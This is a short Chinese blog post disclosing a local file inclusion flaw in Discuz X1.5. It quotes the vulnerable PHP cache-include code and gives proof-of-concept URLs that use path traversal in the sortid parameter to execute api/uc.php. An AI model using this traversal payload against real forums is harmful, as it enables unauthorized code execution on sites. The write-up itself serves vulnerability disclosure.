 

DISCUZ X1.5 本地文件包含漏洞说明_漏洞分析_网络安全_

2024-03-23 15:50:10 浏览量(47)

config_global.php

复制代码

代码如下:

　　$_config['cache']['type'] = ‘file’;
　　function cachedata($cachenames) {
　　……
　　$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
　　……
　　if($isfilecache) {
　　$lostcaches = array();
　　foreach($cachenames as $cachename) {
　　if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
　　$lostcaches[] = $cachename;
　　}
　　}
　　……
　　}

　　地址：
　　http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
　　http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
　　执行了 api/uc.php 页面代码了。
　　作者： Jannock

【声明】：本博客不参与任何交易，也非中介，仅记录个人感兴趣的主机测评结果和优惠活动，内容均不作直接、间接、法定、约定的保证。访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客，即表示您已经知晓并接受了此声明通告。

分享到